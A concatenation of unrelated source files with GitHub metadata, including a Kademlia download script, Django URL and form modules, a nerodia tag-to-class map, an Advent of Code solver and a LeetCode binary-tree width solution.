5cd04361f26f5da04f4dd9f697d57ab51f7e0f1d | 66cab93c26cc252f412860778131b208c6f120be | /parts/newproject/webob/acceptparse.py | df3db6b411f45e2366c6215b630c553c1de21ec3 | []
| no_license | marcogarzini/Zodiac | 3332733f6ae8d64924557ff022f44c835aeac0a9 | 06e8ad0c709189dc65a26fb7d6c17a9ee2bc9112 | refs/heads/master | 2016-09-11T03:18:12.805299 | 2014-01-17T12:50:03 | 2014-01-17T12:50:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | /home/user1/newproject/eggs/WebOb-1.2.3-py2.7.egg/webob/acceptparse.py | [
"user1@user1-VirtualBox.(none)"
]
| user1@user1-VirtualBox.(none) |
3c62b147291c14be369f9d73ced805f7f8773c2f | 5044413a31d50b8220c87ae02acc7b059c7bf5ec | /T2/KademliaLibrary/example/download.py | 4be810183d08324cbd67d47e8459bd7b3f0cb044 | []
| no_license | rjherrera/IIC2523 | 500540350d06a1d11866093ec8d5df984728875c | 756c4a3d9a59d72f66280333c8b48536c03ab592 | refs/heads/master | 2020-03-28T00:25:53.312660 | 2017-12-13T19:06:41 | 2017-12-13T19:06:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | from kademlia_iic2523.ipc import ipcSend
import requests
import socket
import sys
FILES_FOLDER = '/user/rjherrera/T2/files'
def download(url):
# try as we may recieve unexpected things. Also to use a friendly way of showing errors
try:
# use the requests library to try to download the file
r = requests.get(url, stream=True)
if r.status_code == 200:
# if we can we dump it to the desired location
with open('%s/%s' % (FILES_FOLDER, sys.argv[1]), 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
return True
raise Exception(r.status_code)
except Exception as error:
print(error)
return False
def onResponse(message):
ip_address = socket.gethostbyname(socket.gethostname())
for url in message:
if download(url):
node_url = 'http://%s:11009/%s' % (ip_address, sys.argv[1])
# 'set' the file in our location (node_url) -> we are now registered as a server for it
ipcSend('set %s %s' % (sys.argv[1], node_url))
return
print('File not downloaded.')
ipcSend('get %s' % sys.argv[1], onResponse)
| [
"[email protected]"
]
| |
2b206bd77e2c71810ed891c15081bb40dd02a4af | c05357142b9f112d401a77f9610079be3500675d | /danceschool/core/urls.py | acc3ba46762b7690b07c61b675bf598fcdb0daac | [
"BSD-3-Clause"
]
| permissive | NorthIsUp/django-danceschool | b3df9a9373c08e51fcaa88751e325b6423f36bac | 71661830e87e45a3df949b026f446c481c8e8415 | refs/heads/master | 2021-01-02T22:42:17.608615 | 2017-08-04T17:27:37 | 2017-08-04T17:27:37 | 99,373,397 | 1 | 0 | null | 2017-08-04T19:21:50 | 2017-08-04T19:21:50 | null | UTF-8 | Python | false | false | 2,997 | py | from django.conf.urls import url
from django.contrib import admin
from .feeds import EventFeed, json_event_feed
from .views import SubmissionRedirectView, InstructorStatsView, OtherInstructorStatsView, IndividualClassView, IndividualEventView, StaffDirectoryView, EmailConfirmationView, SendEmailView, SubstituteReportingView, InstructorBioChangeView, AccountProfileView, OtherAccountProfileView
from .ajax import UserAccountInfo, updateSeriesAttributes, getEmailTemplate
from .autocomplete_light_registry import CustomerAutoComplete, UserAutoComplete
admin.autodiscover()
urlpatterns = [
# These URLs are for Ajax and autocomplete functionality
url(r'^staff/substitute/filter/$', updateSeriesAttributes, name='ajaxhandler_submitsubstitutefilter'),
url(r'^staff/sendemail/template/$', getEmailTemplate, name='ajaxhandler_getemailtemplate'),
url(r'^staff/autocomplete/user', UserAutoComplete.as_view(), name='autocompleteUser'),
url(r'^staff/autocomplete/customer', CustomerAutoComplete.as_view(), name='autocompleteCustomer'),
url(r'^accounts/info/$', UserAccountInfo.as_view(), name='getUserAccountInfo'),
# For general admin form submission redirects
url(r'^form/submitted/$', SubmissionRedirectView.as_view(), name='submissionRedirect'),
url(r'^staff/directory/$',StaffDirectoryView.as_view(),name='staffDirectory'),
url(r'^staff/sendemail/$', SendEmailView.as_view(),name='emailStudents'),
url(r'^staff/sendemail/confirm/$', EmailConfirmationView.as_view(),name='emailConfirmation'),
url(r'^staff/substitute/$', SubstituteReportingView.as_view(),name='substituteTeacherForm'),
# These provide the ability to view one's own stats or another instructor's stats
url(r'^staff/instructor-stats/(?P<first_name>[\w\+\.]+)-(?P<last_name>[\w\+\.]+)/$', OtherInstructorStatsView.as_view(), name='instructorStats'),
url(r'^staff/instructor-stats/$', InstructorStatsView.as_view(), name='instructorStats'),
# This provides the ability to edit one's own bio
url(r'^staff/bio/$', InstructorBioChangeView.as_view(), name='instructorBioChange'),
# These are for the calendar feeds
url(r'^events/feed/$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/$', json_event_feed, name='jsonCalendarFeed'),
url(r'^events/feed/(?P<instructorFeedKey>[\w\-_]+)$', EventFeed(), name='calendarFeed'),
url(r'^events/feed/json/(?P<instructorFeedKey>[\w\-_]+)$', json_event_feed, name='jsonCalendarFeed'),
# These are for individual class views and event views
url(r'^classes/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualClassView.as_view(), name='classView'),
url(r'^events/(?P<year>[0-9]+)/(?P<month>[\w]+)/(?P<slug>[\w\-_]+)/$', IndividualEventView.as_view(), name='eventView'),
url(r'^accounts/profile/(?P<user_id>[0-9]+)/$', OtherAccountProfileView.as_view(), name='accountProfile'),
url(r'^accounts/profile/$', AccountProfileView.as_view(), name='accountProfile'),
]
| [
"[email protected]"
]
| |
c32bf7266de063e1e276f4b6ab28ed930165b860 | 9f7d4d76c7e66aa424a5f8723575dc489f1fd2ab | /2022/15/15.py | 7d6fdb456fc09a05011e86519edbfcdeac7af504 | [
"MIT"
]
| permissive | kristianwiklund/AOC | df5a873287304816f25d91259c6e6c99c7a5f4bf | d9a668c406d2fd1b805d9b6a34cffa237a33c119 | refs/heads/master | 2023-01-12T09:01:11.012081 | 2023-01-02T19:12:29 | 2023-01-02T19:12:29 | 227,458,380 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,007 | py | import sys
sys.path.append("../..")
from utilities import *
import networkx as nx
from copy import deepcopy
from pprint import pprint
arr = readarray("input.txt")
row = 2000000
#row=10
beac=list()
sens=list()
for l in arr:
x=int(l[2].split("=")[1].strip(","))
y=int(l[3].split("=")[1].strip(":"))
s=complex(x,y)
# print(s)
sens.append(s)
x=int(l[8].split("=")[1].strip(","))
y=int(l[9].split("=")[1].strip(":"))
b=complex(x,y)
# print(b)
beac.append(b)
print(sens)
# for each beacon
# identify the lines defining the area of the relevant beacon coverage
# project those lines on the line we want to look at
# the length of the line grows with +1 on each side from the center for each row above the furthest row
# the result is a set of lines showing what is covered
def cover(s,b,l):
d = int(abs(s.imag-b.imag)+abs(s.real-b.real))
if int(s.imag+d)<l:
return None
# d is the max distance where we have guaranteed no other beacons
# at that place, we have one single blob right below the sensor
# at position (s.real, s.imag+d)
# for each distance above this, we get an additional blob on the
# side
side = d-abs(s.imag-l)
if(side<0):
return None
# print("cover",s,b,"(s)",side,"<<",d,">>",(s.real - abs(side), s.real + abs(side)))
return (s.real - abs(side), s.real + abs(side))
def lineme(row):
line=list()
for i in range(len(sens)):
c = cover(sens[i],beac[i],row)
if c:
line.append(c)
line=sorted(line,key=lambda x:x[0])
return line
#print(mi,ma)
def yes(x, line):
for i in line:
if x>=i[0] and x<=i[1]:
return True
return False
def scoreme(line, maxx=None):
score=0
ma = max([int(y) for x,y in line])
if maxx:
ma = max(maxx,ma)
mi = min([int(x) for x,y in line])
for i in range(mi,ma):
if yes(i,line):
score+=1
if (ma-mi)<80:
print("#",end="")
else:
if (ma-mi)<80:
print(".",end="")
return score
print("")
line = lineme(row)
print("part 1:",scoreme(line))
def overlap(a,b):
if a==b:
return True
if a[0]>=b[0] and a[1]<=b[1]:
return True
else:
return False
def cm(a,b):
if a==b:
return 0
if a[0]==b[0]:
if a[1]==b[1]:
return 0
if a[1]<b[1]:
return -1
return 1
if a[0]<b[0]:
return -1
return 1
from functools import cmp_to_key
for i in range(0,4000000):
line = lineme(i)
line= sorted(list(line),key=cmp_to_key(cm))
x=0
for j in line:
if j[0]<x:
if j[1]<x:
continue
if j[0]-x == 2:
print ("part 2:", i+(x+1)*4000000,line)
import sys
sys.exit()
x=j[1]
if x>4000000:
break
| [
"[email protected]"
]
| |
d2c84ea4ee599a3dca31d420a60f2e17b98158a9 | fa2526ce1d65a2e58958a61c34cee1ba7cf73b94 | /setup.py | 958cccc8103c3d1f18213fd6d55c4f3cb9978257 | [
"ZPL-2.1"
]
| permissive | Zojax/zojax.portlets.livesearch | c480a19bd57b8b348032e40203696e4c53c68347 | 95f117ce89e0dc1fbfefdbec7969170caa3a1caf | refs/heads/master | 2020-12-30T10:36:43.760852 | 2011-08-09T22:33:26 | 2011-08-09T22:33:26 | 2,035,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | ##############################################################################
#
# Copyright (c) 2008 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Setup for zojax.portlets.livesearch package
$Id$
"""
import sys, os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
version='1.0.0dev'
setup(name = 'zojax.portlets.livesearch',
version = version,
author = 'Nikolay Kim',
author_email = '[email protected]',
description = "Google Ads portlet",
long_description = (
'Detailed Documentation\n' +
'======================\n'
+ '\n\n' +
read('CHANGES.txt')
),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Zope Public License',
'Programming Language :: Python',
'Natural Language :: English',
'Operating System :: OS Independent',
'Topic :: Internet :: WWW/HTTP',
'Framework :: Zope3'],
url='http://zojax.net/',
license='ZPL 2.1',
packages=find_packages('src'),
package_dir = {'':'src'},
namespace_packages=['zojax', 'zojax.portlets'],
install_requires = ['setuptools', 'simplejson',
'zope.component',
'zope.interface',
'zope.schema',
'zope.i18nmessageid',
'zojax.catalog',
'zojax.portlet',
'zojax.ownership',
'zojax.formatter',
'zojax.ui.searching',
'zojax.js.extjs',
'zojax.resource',
'zojax.resourcepackage',
],
extras_require = dict(test=['zojax.portlet [test]']),
include_package_data = True,
zip_safe = False
)
| [
"[email protected]"
]
| |
74da8fcf18ff9a8150ba39ee90f91be05dea8255 | 0b70b9f582d2b010305ad1e5e4885f30435a5a74 | /GUEST/forms.py | ae9847e5b58e1badfbd1bde00f04d04ed4a557f7 | []
| no_license | SruthiSasidharan/DjangoProjects | 51fa60282b398f4ebf03383220ce046ae1e1beed | 6fccc3e1d571638949953ed9fc390068417ce713 | refs/heads/master | 2023-06-28T02:24:32.355568 | 2021-07-29T07:45:26 | 2021-07-29T07:45:26 | 370,647,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | from Guest import forms
from .models import Review
from django.forms import ModelForm
class ReviewCreateForm(forms.ModelForm):
class Meta:
model=Review
fields=["review"]
| [
"[email protected]"
]
| |
5be8330c7a2af0ba0d2b7752a2f74e9b0b078107 | f16e6cff9270ffece7f28473a46a49f76044eae1 | /data_and_proc/sp2genus.py | 4fcb8182b68b5087bea63b7412024f334e0a339a | []
| no_license | Klim314/pubcrawl | fe9e0a4ad0df35367a685856edb7983453fda345 | cd873d0741c6ed1a09867ce86077927afd7be450 | refs/heads/master | 2021-01-18T19:17:49.786829 | 2015-06-19T03:48:03 | 2015-06-19T03:48:03 | 35,801,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | #!/usr/bin/env python3
import sys
target = sys.argv[1]
output = sys.argv[2]
holder =set()
with open(target) as f:
for i in f:
splat = i.strip().split("\t")
holder.add((splat[0].split(' ')[0], splat[1].split(' ')[0]))
with open(output, 'w') as f:
for i in holder:
f.write(" ".join(i) + '\n')
| [
"[email protected]"
]
| |
549932aa539333a091f31dc81f22a937b394e990 | 62bf350adedcb1d04a97ca5e1f576e1f73493c53 | /nerodia/tag_map.py | 33d536cc6e637a42fc23f84dd48bd2271b1f0be7 | [
"MIT"
]
| permissive | mark0203/nerodia | 57ca4bdf36ee6d84b46fb177b6e385f6c82c164d | 2631c210fbaa0a7b5d598016e11ad7c7af083237 | refs/heads/master | 2020-05-24T00:44:25.189039 | 2019-03-10T00:41:51 | 2019-03-10T00:43:50 | 187,021,782 | 0 | 0 | MIT | 2019-05-16T19:46:54 | 2019-05-16T12:17:40 | Python | UTF-8 | Python | false | false | 14,862 | py | from nerodia import tag_to_class
from .elements.area import Area
from .elements.button import Button
from .elements.d_list import DList
from .elements.form import Form
from .elements.html_elements import HTMLElement, Audio, Base, Quote, Body, BR, Canvas, \
TableCaption, TableCol, Data, DataList, Mod, Details, Dialog, Div, Embed, FieldSet, FrameSet, \
Heading, Head, HR, Html, Label, Legend, LI, Map, Meta, Meter, Object, \
OptGroup, Output, Paragraph, Param, Pre, Progress, Script, Source, Span, Style, \
Template, TableHeaderCell, Time, Title, Track, Video, AnchorCollection, \
HTMLElementCollection, AreaCollection, AudioCollection, BaseCollection, QuoteCollection, \
BodyCollection, BRCollection, ButtonCollection, CanvasCollection, TableCaptionCollection, \
TableColCollection, DataCollection, DataListCollection, ModCollection, DetailsCollection, \
DialogCollection, DivCollection, DListCollection, EmbedCollection, FieldSetCollection, \
FormCollection, FrameSetCollection, HeadingCollection, HeadCollection, HRCollection, \
HtmlCollection, IFrameCollection, ImageCollection, InputCollection, \
LabelCollection, LegendCollection, LICollection, MapCollection, \
MetaCollection, MeterCollection, ObjectCollection, OListCollection, \
OptGroupCollection, OptionCollection, OutputCollection, ParagraphCollection, ParamCollection, \
PreCollection, ProgressCollection, ScriptCollection, SelectCollection, SourceCollection, \
SpanCollection, StyleCollection, TableDataCellCollection, TemplateCollection, TextAreaCollection, \
TableCollection, TableHeaderCellCollection, TableSectionCollection, TimeCollection, TitleCollection, \
TableRowCollection, TrackCollection, UListCollection, VideoCollection
from .elements.i_frame import IFrame
from .elements.image import Image
from .elements.input import Input
from .elements.link import Anchor
from .elements.list import OList, UList
from .elements.option import Option
from .elements.radio import Radio, RadioCollection
from .elements.radio_set import RadioSet
from .elements.select import Select
from .elements.svg_elements import Circle, CircleCollection, Defs, DefsCollection, Desc, \
DescCollection, Ellipse, EllipseCollection, ForeignObject, ForeignObjectCollection, G, \
GCollection, Line, LineCollection, LinearGradient, LinearGradientCollection, Marker, \
MarkerCollection, Metadata, MetadataCollection, Path, PathCollection, Pattern, \
PatternCollection, Polygon, PolygonCollection, Polyline, PolylineCollection, RadialGradient, \
RadialGradientCollection, Rect, RectCollection, Stop, StopCollection, SVG, SVGCollection, \
Switch, SwitchCollection, Symbol, SymbolCollection, TextPath, TextPathCollection, TSpan, \
TSpanCollection, Use, UseCollection, View, ViewCollection
from .elements.table import Table
from .elements.table_data_cell import TableDataCell
from .elements.table_row import TableRow
from .elements.table_section import TableSection
from .elements.text_area import TextArea
tag_to_class['a'] = Anchor
tag_to_class['a_collection'] = AnchorCollection
tag_to_class['link'] = Anchor
tag_to_class['link_collection'] = AnchorCollection
tag_to_class['abbr'] = HTMLElement
tag_to_class['abbr_collection'] = HTMLElementCollection
tag_to_class['address'] = HTMLElement
tag_to_class['address_collection'] = HTMLElementCollection
tag_to_class['area'] = Area
tag_to_class['area_collection'] = AreaCollection
tag_to_class['article'] = HTMLElement
tag_to_class['article_collection'] = HTMLElementCollection
tag_to_class['aside'] = HTMLElement
tag_to_class['aside_collection'] = HTMLElementCollection
tag_to_class['audio'] = Audio
tag_to_class['audio_collection'] = AudioCollection
tag_to_class['b'] = HTMLElement
tag_to_class['b_collection'] = HTMLElementCollection
tag_to_class['base'] = Base
tag_to_class['base_collection'] = BaseCollection
tag_to_class['bdi'] = HTMLElement
tag_to_class['bdi_collection'] = HTMLElementCollection
tag_to_class['bdo'] = HTMLElement
tag_to_class['bdo_collection'] = HTMLElementCollection
tag_to_class['blockquote'] = Quote
tag_to_class['blockquote_collection'] = QuoteCollection
tag_to_class['body'] = Body
tag_to_class['body_collection'] = BodyCollection
tag_to_class['br'] = BR
tag_to_class['br_collection'] = BRCollection
tag_to_class['button'] = Button
tag_to_class['button_collection'] = ButtonCollection
tag_to_class['canvas'] = Canvas
tag_to_class['canvas_collection'] = CanvasCollection
tag_to_class['caption'] = TableCaption
tag_to_class['caption_collection'] = TableCaptionCollection
tag_to_class['circle'] = Circle
tag_to_class['circle_collection'] = CircleCollection
tag_to_class['cite'] = HTMLElement
tag_to_class['cite_collection'] = HTMLElementCollection
tag_to_class['code'] = HTMLElement
tag_to_class['code_collection'] = HTMLElementCollection
tag_to_class['col'] = TableCol
tag_to_class['col_collection'] = TableColCollection
tag_to_class['colgroup'] = TableCol
tag_to_class['colgroup_collection'] = TableColCollection
tag_to_class['data'] = Data
tag_to_class['data_collection'] = DataCollection
tag_to_class['datalist'] = DataList
tag_to_class['datalist_collection'] = DataListCollection
tag_to_class['dd'] = HTMLElement
tag_to_class['dd_collection'] = HTMLElementCollection
tag_to_class['defs'] = Defs
tag_to_class['defs_collection'] = DefsCollection
tag_to_class['del'] = Mod
tag_to_class['del_collection'] = ModCollection
tag_to_class['delete'] = Mod
tag_to_class['delete_collection'] = ModCollection
tag_to_class['desc'] = Desc
tag_to_class['desc_collection'] = DescCollection
tag_to_class['details'] = Details
tag_to_class['details_collection'] = DetailsCollection
tag_to_class['dfn'] = HTMLElement
tag_to_class['dfn_collection'] = HTMLElementCollection
tag_to_class['dialog'] = Dialog
tag_to_class['dialog_collection'] = DialogCollection
tag_to_class['div'] = Div
tag_to_class['div_collection'] = DivCollection
tag_to_class['dl'] = DList
tag_to_class['dl_collection'] = DListCollection
tag_to_class['dt'] = HTMLElement
tag_to_class['dt_collection'] = HTMLElementCollection
tag_to_class['ellipse'] = Ellipse
tag_to_class['ellipse_collection'] = EllipseCollection
tag_to_class['em'] = HTMLElement
tag_to_class['em_collection'] = HTMLElementCollection
tag_to_class['embed'] = Embed
tag_to_class['embed_collection'] = EmbedCollection
tag_to_class['fieldset'] = FieldSet
tag_to_class['fieldset_collection'] = FieldSetCollection
tag_to_class['figcaption'] = HTMLElement
tag_to_class['figcaption_collection'] = HTMLElementCollection
tag_to_class['figure'] = HTMLElement
tag_to_class['figure_collection'] = HTMLElementCollection
tag_to_class['footer'] = HTMLElement
tag_to_class['footer_collection'] = HTMLElementCollection
tag_to_class['foreignObject'] = ForeignObject
tag_to_class['foreignObject_collection'] = ForeignObjectCollection
tag_to_class['form'] = Form
tag_to_class['form_collection'] = FormCollection
tag_to_class['frameset'] = FrameSet
tag_to_class['frameset_collection'] = FrameSetCollection
tag_to_class['g'] = G
tag_to_class['g_collection'] = GCollection
tag_to_class['h1'] = Heading
tag_to_class['h1_collection'] = HeadingCollection
tag_to_class['h2'] = Heading
tag_to_class['h2_collection'] = HeadingCollection
tag_to_class['h3'] = Heading
tag_to_class['h3_collection'] = HeadingCollection
tag_to_class['h4'] = Heading
tag_to_class['h4_collection'] = HeadingCollection
tag_to_class['h5'] = Heading
tag_to_class['h5_collection'] = HeadingCollection
tag_to_class['h6'] = Heading
tag_to_class['h6_collection'] = HeadingCollection
tag_to_class['head'] = Head
tag_to_class['head_collection'] = HeadCollection
tag_to_class['header'] = HTMLElement
tag_to_class['header_collection'] = HTMLElementCollection
tag_to_class['hgroup'] = HTMLElement
tag_to_class['hgroup_collection'] = HTMLElementCollection
tag_to_class['hr'] = HR
tag_to_class['hr_collection'] = HRCollection
tag_to_class['html'] = Html
tag_to_class['html_collection'] = HtmlCollection
tag_to_class['i'] = HTMLElement
tag_to_class['i_collection'] = HTMLElementCollection
tag_to_class['ital'] = HTMLElement
tag_to_class['ital_collection'] = HTMLElementCollection
tag_to_class['iframe'] = IFrame
tag_to_class['iframe_collection'] = IFrameCollection
tag_to_class['img'] = Image
tag_to_class['img_collection'] = ImageCollection
tag_to_class['input'] = Input
tag_to_class['input_collection'] = InputCollection
tag_to_class['ins'] = Mod
tag_to_class['ins_collection'] = ModCollection
tag_to_class['kbd'] = HTMLElement
tag_to_class['kbd_collection'] = HTMLElementCollection
tag_to_class['label'] = Label
tag_to_class['label_collection'] = LabelCollection
tag_to_class['legend'] = Legend
tag_to_class['legend_collection'] = LegendCollection
tag_to_class['li'] = LI
tag_to_class['li_collection'] = LICollection
tag_to_class['line'] = Line
tag_to_class['line_collection'] = LineCollection
tag_to_class['linearGradient'] = LinearGradient
tag_to_class['linearGradient_collection'] = LinearGradientCollection
tag_to_class['main'] = HTMLElement
tag_to_class['main_collection'] = HTMLElementCollection
tag_to_class['map'] = Map
tag_to_class['map_collection'] = MapCollection
tag_to_class['mark'] = HTMLElement
tag_to_class['mark_collection'] = HTMLElementCollection
tag_to_class['marker'] = Marker
tag_to_class['marker_collection'] = MarkerCollection
tag_to_class['meta'] = Meta
tag_to_class['meta_collection'] = MetaCollection
tag_to_class['metadata'] = Metadata
tag_to_class['metadata_collection'] = MetadataCollection
tag_to_class['meter'] = Meter
tag_to_class['meter_collection'] = MeterCollection
tag_to_class['nav'] = HTMLElement
tag_to_class['nav_collection'] = HTMLElementCollection
tag_to_class['noscript'] = HTMLElement
tag_to_class['noscript_collection'] = HTMLElementCollection
tag_to_class['object'] = Object
tag_to_class['object_collection'] = ObjectCollection
tag_to_class['ol'] = OList
tag_to_class['ol_collection'] = OListCollection
tag_to_class['optgroup'] = OptGroup
tag_to_class['optgroup_collection'] = OptGroupCollection
tag_to_class['option'] = Option
tag_to_class['option_collection'] = OptionCollection
tag_to_class['output'] = Output
tag_to_class['output_collection'] = OutputCollection
tag_to_class['p'] = Paragraph
tag_to_class['p_collection'] = ParagraphCollection
tag_to_class['path'] = Path
tag_to_class['path_collection'] = PathCollection
tag_to_class['param'] = Param
tag_to_class['param_collection'] = ParamCollection
tag_to_class['pattern'] = Pattern
tag_to_class['pattern_collection'] = PatternCollection
tag_to_class['polygon'] = Polygon
tag_to_class['polygon_collection'] = PolygonCollection
tag_to_class['polyline'] = Polyline
tag_to_class['polyline_collection'] = PolylineCollection
tag_to_class['pre'] = Pre
tag_to_class['pre_collection'] = PreCollection
tag_to_class['progress'] = Progress
tag_to_class['progress_collection'] = ProgressCollection
tag_to_class['q'] = Quote
tag_to_class['q_collection'] = QuoteCollection
tag_to_class['radialGradient'] = RadialGradient
tag_to_class['radialGradient_collection'] = RadialGradientCollection
tag_to_class['radio'] = Radio
tag_to_class['radio_collection'] = RadioCollection
tag_to_class['radio_set'] = RadioSet
tag_to_class['rect'] = Rect
tag_to_class['rect_collection'] = RectCollection
tag_to_class['rp'] = HTMLElement
tag_to_class['rp_collection'] = HTMLElementCollection
tag_to_class['rt'] = HTMLElement
tag_to_class['rt_collection'] = HTMLElementCollection
tag_to_class['ruby'] = HTMLElement
tag_to_class['ruby_collection'] = HTMLElementCollection
tag_to_class['s'] = HTMLElement
tag_to_class['s_collection'] = HTMLElementCollection
tag_to_class['samp'] = HTMLElement
tag_to_class['samp_collection'] = HTMLElementCollection
tag_to_class['script'] = Script
tag_to_class['script_collection'] = ScriptCollection
tag_to_class['section'] = HTMLElement
tag_to_class['section_collection'] = HTMLElementCollection
tag_to_class['select'] = Select
tag_to_class['select_collection'] = SelectCollection
tag_to_class['select_list'] = Select
tag_to_class['select_list_collection'] = SelectCollection
tag_to_class['small'] = HTMLElement
tag_to_class['small_collection'] = HTMLElementCollection
tag_to_class['source'] = Source
tag_to_class['source_collection'] = SourceCollection
tag_to_class['span'] = Span
tag_to_class['span_collection'] = SpanCollection
tag_to_class['stop'] = Stop
tag_to_class['stop_collection'] = StopCollection
tag_to_class['strong'] = HTMLElement
tag_to_class['strong_collection'] = HTMLElementCollection
tag_to_class['style'] = Style
tag_to_class['style_collection'] = StyleCollection
tag_to_class['sub'] = HTMLElement
tag_to_class['sub_collection'] = HTMLElementCollection
tag_to_class['svg'] = SVG
tag_to_class['svg_collection'] = SVGCollection
tag_to_class['summary'] = HTMLElement
tag_to_class['summary_collection'] = HTMLElementCollection
tag_to_class['sup'] = HTMLElement
tag_to_class['sup_collection'] = HTMLElementCollection
tag_to_class['switch'] = Switch
tag_to_class['switch_collection'] = SwitchCollection
tag_to_class['symbol'] = Symbol
tag_to_class['symbol_collection'] = SymbolCollection
tag_to_class['table'] = Table
tag_to_class['table_collection'] = TableCollection
tag_to_class['tbody'] = TableSection
tag_to_class['tbody_collection'] = TableSectionCollection
tag_to_class['td'] = TableDataCell
tag_to_class['td_collection'] = TableDataCellCollection
tag_to_class['template'] = Template
tag_to_class['template_collection'] = TemplateCollection
tag_to_class['textarea'] = TextArea
tag_to_class['textarea_collection'] = TextAreaCollection
tag_to_class['tfoot'] = TableSection
tag_to_class['tfoot_collection'] = TableSectionCollection
tag_to_class['th'] = TableHeaderCell
tag_to_class['th_collection'] = TableHeaderCellCollection
tag_to_class['thead'] = TableSection
tag_to_class['thead_collection'] = TableSectionCollection
tag_to_class['textPath'] = TextPath
tag_to_class['textPath_collection'] = TextPathCollection
tag_to_class['time'] = Time
tag_to_class['time_collection'] = TimeCollection
tag_to_class['title'] = Title
tag_to_class['title_collection'] = TitleCollection
tag_to_class['tr'] = TableRow
tag_to_class['tr_collection'] = TableRowCollection
tag_to_class['track'] = Track
tag_to_class['track_collection'] = TrackCollection
tag_to_class['tspan'] = TSpan
tag_to_class['tspan_collection'] = TSpanCollection
tag_to_class['u'] = HTMLElement
tag_to_class['u_collection'] = HTMLElementCollection
tag_to_class['ul'] = UList
tag_to_class['ul_collection'] = UListCollection
tag_to_class['use'] = Use
tag_to_class['use_collection'] = UseCollection
tag_to_class['var'] = HTMLElement
tag_to_class['var_collection'] = HTMLElementCollection
tag_to_class['video'] = Video
tag_to_class['video_collection'] = VideoCollection
tag_to_class['view'] = View
tag_to_class['view_collection'] = ViewCollection
tag_to_class['wbr'] = HTMLElement
tag_to_class['wbr_collection'] = HTMLElementCollection
| [
"[email protected]"
]
| |
6700f165faf6659309c518dc3c87dec1653b0d0e | 1047999f13e2f1cbc51c605a5cbeead8cc3ef901 | /db_web/sp/tests.py | 01b4b5e910edcec512d4fc5fd3b3704578151861 | []
| no_license | ichoukou/db_web | ff25243309fc38b31eebf6b9565a7b5e73d24bab | b5a935366c8b6e8cc2539e583e41f0bce2e83c10 | refs/heads/master | 2020-05-20T23:41:38.333132 | 2018-09-11T01:01:59 | 2018-09-11T01:01:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from django.test import TestCase
# Create your tests here.
sr='[1,2,3,4]'
str_lst=list(sr)
print(str_lst,type(str_lst)) | [
"[email protected]"
]
| |
626ef1a1961641711c3f61312880cea3994ab7ea | 8d55d3a52ed6dc8111801cea9c7c9d0a84be736b | /src/662.maximum-width-of-binary-tree.py | 236e7d52ce3fdc75ebc2866c5c0b37f29a9c687d | []
| no_license | mic0ud/Leetcode-py3 | 2a23270034ec470571e57c498830b93af813645f | 61fabda324338e907ce3514ae8931c013b8fe401 | refs/heads/master | 2022-12-26T11:52:31.666395 | 2020-09-27T19:27:10 | 2020-09-27T19:27:10 | 297,135,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,889 | py | #
# @lc app=leetcode id=662 lang=python3
#
# [662] Maximum Width of Binary Tree
#
# https://leetcode.com/problems/maximum-width-of-binary-tree/description/
#
# algorithms
# Medium (39.55%)
# Likes: 860
# Dislikes: 187
# Total Accepted: 45.6K
# Total Submissions: 115.4K
# Testcase Example: '[1,3,2,5,3,null,9]'
#
# Given a binary tree, write a function to get the maximum width of the given
# tree. The width of a tree is the maximum width among all levels. The binary
# tree has the same structure as a full binary tree, but some nodes are null.
#
# The width of one level is defined as the length between the end-nodes (the
# leftmost and right most non-null nodes in the level, where the null nodes
# between the end-nodes are also counted into the length calculation.
#
# Example 1:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \ \
# 5 3 9
#
# Output: 4
# Explanation: The maximum width existing in the third level with the length 4
# (5,3,null,9).
#
#
# Example 2:
#
#
# Input:
#
# 1
# /
# 3
# / \
# 5 3
#
# Output: 2
# Explanation: The maximum width existing in the third level with the length 2
# (5,3).
#
#
# Example 3:
#
#
# Input:
#
# 1
# / \
# 3 2
# /
# 5
#
# Output: 2
# Explanation: The maximum width existing in the second level with the length 2
# (3,2).
#
#
# Example 4:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \
# 5 9
# / \
# 6 7
# Output: 8
# Explanation:The maximum width existing in the fourth level with the length 8
# (6,null,null,null,null,null,null,7).
#
#
#
#
# Note: Answer will in the range of 32-bit signed integer.
#
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from queue import Queue
class Solution:
def widthOfBinaryTree(self, root: TreeNode) -> int:
if not root:
return 0
q = Queue()
q.put([root])
res = 1
while True:
nodes = q.get()
next_ = []
i, start, end = 0, 0, 0
while i < len(nodes) and not nodes[i]:
i += 1
if i == len(nodes):
break
start, i = i, len(nodes)-1
while i > start and not nodes[i]:
i -= 1
end = i
res = max(res, end-start+1)
for k in range(start, end+1):
next_.append(nodes[k].left if nodes[k] else None)
next_.append(nodes[k].right if nodes[k] else None)
q.put(next_)
return res
# @lc code=end
| [
"[email protected]"
]
| |
